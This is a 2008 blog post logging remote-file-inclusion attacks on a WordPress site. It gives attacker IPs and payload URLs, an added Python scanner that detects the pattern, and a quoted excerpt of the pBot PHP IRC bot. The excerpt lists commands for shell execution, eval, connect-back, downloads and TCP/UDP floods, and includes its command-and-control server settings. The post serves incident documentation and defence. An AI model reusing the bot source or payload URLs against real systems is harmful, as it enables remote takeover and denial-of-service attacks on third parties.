Today we upgraded from WordPress 2.3.2 to the 2.3.3 security release. There were 21 attacks (script injections) on blog.kakkoi.net from 3 known bot-herder scripts ↓. The first attacker came from 212.24.62.200 → udkado.ru, masking their user agent as Googlebot (a real human?). They were playing with my 302.curie redirect page at blog.kakkoi.net/uri/. I sent the attacker data to the network's abuse contact and to IronPort. Over the next few hours we received 20 more attacks from the same bot-herder. They probably have a large pool of DDNS hosts (china → korea → us). Noticeably, the scan pattern is predictable: since our Feb 5th attack all of these botnets have been targeting certain search keywords (security, injection), so we set up a honey-pot right on that particular URL.
Hacking Attempts on Kakkoi
Sorted by injection type.

| IP / DDNS | UA | ATT (attacks) | Country | Params |
| --- | --- | --- | --- | --- |
| 212.24.62.200 | Googlebot | 1 | Russia | www.yahoo.com (Request URI: www.yahoo.com) |
| 61.152.158.46 | N/A | 4 | China | http://basiclifesaving.org/mycomments/rom.txt, http://www.freewebtown.com/acc827/test.txt (Request URI: /security/injection/) |
|  | N/A | 16 |  | http://basiclifesaving.org/mycomments/rom.txt, http://www.freewebtown.com/acc827/test.txt (Request URI: /security/injection/) |
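As an added example (not the blog's own code), here is a small Python log scanner that rebuilds the per-IP summary above from Apache combined-format access log lines: it flags requests whose query value names another host (the remote-file-inclusion pattern the bots used against /security/injection/ and the /uri/ redirect page) and records whether the source claimed a Googlebot user agent. The log lines are constructed for this example; only the IPs, paths and payload URLs come from the table. A Googlebot claim can only be confirmed by a reverse DNS lookup of the source IP followed by a forward lookup of the result, which the example notes but does not perform.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlparse

# Constructed sample Apache combined-log lines; IPs, UA claim, paths and
# payload URLs are the ones from the post's table, the rest is invented.
SAMPLE_LOG = """\
212.24.62.200 - - [06/Feb/2008:10:12:01 +0000] "GET /uri/?url=www.yahoo.com HTTP/1.1" 302 0 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
61.152.158.46 - - [06/Feb/2008:11:03:44 +0000] "GET /security/injection/?page=http://basiclifesaving.org/mycomments/rom.txt HTTP/1.1" 200 5123 "-" "-"
61.152.158.46 - - [06/Feb/2008:11:03:45 +0000] "GET /security/injection/?page=http://www.freewebtown.com/acc827/test.txt HTTP/1.1" 200 5123 "-" "-"
10.0.0.5 - - [06/Feb/2008:12:00:00 +0000] "GET /security/injection/?page=about HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def looks_remote(value):
    """A query value that names another host: scheme-prefixed URL or bare www.host."""
    return re.match(r'^(?:(?:https?|ftp)://|www\.)', value, re.I) is not None

def classify(line):
    """Return (ip, ua, path, payload) for a remote-inclusion attempt, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m['uri'])
    for _, value in parse_qsl(parsed.query):
        if looks_remote(value):
            return m['ip'], m['ua'], parsed.path, value
    return None

def summarize(log_text):
    """Aggregate attempts per source IP, mirroring the post's attack table."""
    per_ip = defaultdict(lambda: {"attempts": 0, "payloads": set(),
                                  "paths": set(), "claims_googlebot": False})
    for line in log_text.splitlines():
        hit = classify(line)
        if hit is None:
            continue
        ip, ua, path, payload = hit
        entry = per_ip[ip]
        entry["attempts"] += 1
        entry["payloads"].add(payload)
        entry["paths"].add(path)
        # A Googlebot UA string proves nothing; confirm via reverse + forward DNS (not done here).
        entry["claims_googlebot"] |= "googlebot" in ua.lower()
    return dict(per_ip)
```

Run `summarize(SAMPLE_LOG)` to get one entry per attacking IP with its attempt count, the remote URLs it tried to inject, the paths it hit and whether it posed as Googlebot.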
The Bot-herder Host
Part of the pBot class source, taken from http://basiclifesaving.org/mycomments/rom.txt:
```php
<?
/*
 * #crew@corp. since 2003
 * edited by: devil__ <admin@xdevil.org>
 *
 * COMMANDS:
 *
 * .user <password>                                          //login to the bot
 * .logout                                                   //logout of the bot
 * .die                                                      //kill the bot
 * .restart                                                  //restart the bot
 * .mail <to> <from> <subject> <msg>                         //send an email
 * .dns <IP|HOST>                                            //dns lookup
 * .download <URL> <filename>                                //download a file
 * .exec <cmd>                   // uses exec()              //execute a command
 * .sexec <cmd>                  // uses shell_exec()        //execute a command
 * .cmd <cmd>                    // uses popen()             //execute a command
 * .info                                                     //get system information
 * .php <php code>               // uses eval()              //execute php code
 * .tcpflood <target> <packets> <packetsize> <port> <delay>  //tcpflood attack
 * .udpflood <target> <packets> <packetsize> <delay>         //udpflood attack
 * .raw <cmd>                                                //raw IRC command
 * .rndnick                                                  //change nickname
 * .pscan <host> <port>                                      //port scan
 * .safe                         // test safe_mode (dvl)
 * .inbox <to>                   // test inbox (dvl)
 * .conback <ip> <port>          // conect back (dvl)
 * .uname                        // return shell's uname using a php function (dvl)
 *
 */
set_time_limit(0);
error_reporting(0);
echo "Ok unlocker. We did i!";

class pBot
{
    var $config = array(
        "server"=>"Bucharest.ro.eu.ultra-chat.org",
        "port"=>"6667",
        "pass"=>"n",
        "prefix"=>"[R]",
        "maxrand"=>"4",
        "chan"=>"#unlocker",
        "chan2"=>"#unlocker",
        "key"=>"n",
        "modes"=>"+p",
        "password"=>"n",
        "trigger"=>".",
        "hostauth"=>"Robert.users.ultra-chat.org" // * for any hostname (remember: /setvhost xdevil.org)
    );
```

Related Posts
- Daily Hacking Attempts on blog.kakkoi.net - Feb 5th, 2008
- Mass Remote Code Injection as Googlebot - Packet Spoofing Perl bot & Trojan
No responses to “Daily Hacking Attempts on blog.kakkoi.net - Feb 6th, 2008”